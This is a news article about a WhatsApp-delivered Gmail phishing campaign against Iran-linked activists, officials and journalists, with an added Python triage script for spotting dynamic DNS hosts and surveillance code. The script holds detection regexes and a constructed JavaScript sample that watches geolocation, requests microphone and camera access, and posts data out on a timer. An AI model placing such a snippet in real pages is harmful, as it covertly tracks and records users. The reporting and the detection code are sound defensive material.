A Case That Shows How Easily Digital Trails Can Be Manipulated

WhatsApp Links Used in Sophisticated Gmail Phishing Attack

The420 Correspondent

The campaign came into public view after Nariman Gharib, a U.K.-based Iranian activist, disclosed receiving a suspicious WhatsApp message containing a link that appeared to reference a virtual meeting. Gharib, who closely monitors the digital dimensions of Iran’s protest movement, warned others not to click on such links and shared evidence of the attempt online.

Soon after, he provided the full phishing link and technical notes to TechCrunch, allowing reporters and independent security researchers to examine the infrastructure behind the attack. Their analysis revealed a sophisticated phishing operation designed not only to steal account credentials but also to enable real-time surveillance of victims’ devices.

The disclosure came at a sensitive moment: Iran is experiencing its longest nationwide internet shutdown, imposed as protests and violent crackdowns continue. In such an environment, secure digital communication has become both more vital and more vulnerable.

Inside the Attack Chain

According to the technical analysis, the WhatsApp message sent to Gharib directed targets to a phishing site that relied on DuckDNS, a free dynamic DNS service that lets anyone point a subdomain at a server they control, a feature attackers commonly abuse to hide the real host behind a link. The technique allowed attackers to generate links that appeared benign while redirecting victims to malicious pages hosted elsewhere.

The phishing infrastructure was ultimately traced to a domain registered in early November 2025. Related domains followed naming patterns that suggested the attackers were also impersonating providers of virtual meeting services, broadening the scope of potential lures. Investigators believe the DuckDNS layer helped disguise the phishing links as legitimate WhatsApp-related resources.

While the phishing page itself no longer loads, examination of its source code offered insight into how the attack functioned. Depending on the target, victims were presented with fake Gmail login pages or prompted to enter phone numbers, initiating a step-by-step process to harvest passwords and two-factor authentication codes.

Credentials, Surveillance and an Exposed Server

One of the most striking findings was a flaw on the attackers’ own servers. By modifying the phishing page’s URL, researchers were able to access an exposed file that logged victim submissions in real time. The file contained more than 850 records, including usernames, passwords, failed login attempts and two-factor codes—effectively operating as a keylogger.

The data revealed dozens of compromised victims, among them a Middle Eastern academic specialising in national security, a senior Lebanese cabinet minister, the head of an Israeli drone manufacturer, journalists and individuals based in or connected to the United States. The logs showed that the campaign targeted users across Windows, macOS, iPhone and Android devices.

Beyond credential theft, the phishing code also enabled device-level surveillance. Security researcher Runa Sandvik, who reviewed the code, found that the page requested access to a victim’s location, microphone and camera. If granted, the browser would transmit coordinates every few seconds and periodically capture audio and images—though investigators did not observe such media stored on the exposed server.

In parallel, some targets were shown WhatsApp-themed pages displaying QR codes. Scanning the code could silently link a victim’s WhatsApp account to an attacker-controlled device, a known technique that exploits the app’s multi-device feature and allows full access to messages and contacts.
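The two indicators the article describes, a throwaway dynamic DNS host in the link and page code that asks for location, microphone and camera and then ships data out on a timer, are both things a defender can check for when triaging a suspicious link. The script below is an added illustration, not tooling from the article or from the researchers who examined the case; the hostname and page source it inspects are constructed placeholders, and the list of dynamic DNS suffixes beyond DuckDNS is an assumption added for breadth.

```python
"""
Added triage example (not from the article or the researchers' own tooling).
Given a suspicious URL and the HTML/JS of the page it leads to, flag the two
indicators the article describes: a dynamic-DNS host (DuckDNS) and page code
that requests location, microphone or camera and sends data out periodically.
All sample values below are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Dynamic DNS providers commonly abused for throwaway phishing hosts.
# DuckDNS is the one named in the article; the others are assumptions added
# as further examples of the same class of service.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net")

# Browser APIs and patterns that, together, point to device-level
# surveillance rather than a plain credential form.
SURVEILLANCE_PATTERNS = {
    "geolocation": re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)"),
    "media_capture": re.compile(r"getUserMedia\s*\("),
    "periodic_send": re.compile(r"setInterval\s*\("),
    "outbound_post": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b"),
}


def classify_host(url: str) -> dict:
    """Return the hostname and whether it sits under a dynamic DNS provider."""
    host = (urlparse(url).hostname or "").lower()
    dyn = any(host == s or host.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)
    return {"host": host, "dynamic_dns": dyn}


def scan_page_source(source: str) -> dict:
    """Flag which surveillance-related patterns appear in the page code."""
    return {name: bool(pat.search(source)) for name, pat in SURVEILLANCE_PATTERNS.items()}


def triage(url: str, source: str) -> dict:
    """Combine host and source checks into a single verdict with reasons."""
    host_info = classify_host(url)
    hits = scan_page_source(source)
    reasons = []
    if host_info["dynamic_dns"]:
        reasons.append(f"dynamic DNS host: {host_info['host']}")
    if hits["geolocation"]:
        reasons.append("page requests geolocation")
    if hits["media_capture"]:
        reasons.append("page requests microphone/camera")
    if hits["periodic_send"] and hits["outbound_post"]:
        reasons.append("page sends data on a timer")
    verdict = "suspicious" if reasons else "no indicators"
    return {"verdict": verdict, "reasons": reasons, **host_info, "patterns": hits}


# Constructed sample: a meeting-themed lure on a DuckDNS subdomain whose page
# asks for position and media and posts on a timer. The hostname and the
# snippet are illustrative placeholders, not infrastructure from the case.
SAMPLE_URL = "https://meeting-join-example.duckdns.org/login?id=123"
SAMPLE_SOURCE = """
<form id="login"><input name="email"><input name="password" type="password"></form>
<script>
navigator.geolocation.watchPosition(function(p){ lastPos = p.coords; });
navigator.mediaDevices.getUserMedia({audio: true, video: true});
setInterval(function(){ fetch('/collect', {method: 'POST', body: JSON.stringify(lastPos)}); }, 5000);
</script>
"""

# Constructed benign comparison: an ordinary login form on a normal host.
BENIGN_URL = "https://accounts.example.com/signin"
BENIGN_SOURCE = "<form><input name='email'><input name='password' type='password'></form>"

if __name__ == "__main__":
    for u, s in ((SAMPLE_URL, SAMPLE_SOURCE), (BENIGN_URL, BENIGN_SOURCE)):
        r = triage(u, s)
        print(r["verdict"], "-", "; ".join(r["reasons"]) or "none")
```

The host check is deliberately suffix-based so that any subdomain under a dynamic DNS provider is caught, and the timer rule only fires when a periodic timer and an outbound call both appear, since either alone is common in ordinary pages. Static pattern matching of this kind is a first-pass filter; obfuscated or dynamically loaded scripts will need the page rendered in an isolated browser to observe the permission prompts directly.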

Espionage, Cybercrime—or Both?

Attribution remains unresolved. The campaign’s narrow targeting, focus on high-value individuals and interest in surveillance data have led some experts to suggest a state-backed operation. Gary Miller of Citizen Lab said the activity bore “the hallmarks of an IRGC-linked spearphishing campaign,” referring to Iran’s Islamic Revolutionary Guard Corps, which has a history of targeted cyber operations.

Others caution that financial motives cannot be ruled out. Stolen Gmail credentials and two-factor codes could also be used to access cryptocurrency wallets, corporate email accounts or other monetisable assets. Domain analysis by DomainTools researcher Ian Campbell found the infrastructure consistent with medium- to high-risk cybercrime activity, noting that some domains predated the protests by several months.

Analysts also point to a hybrid possibility. Iran has previously outsourced cyber operations to criminal groups, a practice that can blur the line between espionage and profit-driven hacking while providing plausible deniability.

What is clear, researchers say, is that the campaign succeeded in compromising accounts and could re-emerge in another form. As digital repression intensifies alongside geopolitical conflict, the episode underscores a recurring lesson for at-risk communities: even a convincing message on a familiar platform can be a gateway to intrusion, surveillance and loss of control over one’s digital life.

About the author — Suvedita Nath is a science student with a growing interest in cybercrime and digital safety. She writes on online activity, cyber threats, and technology-driven risks. Her work focuses on clarity, accuracy, and public awareness.
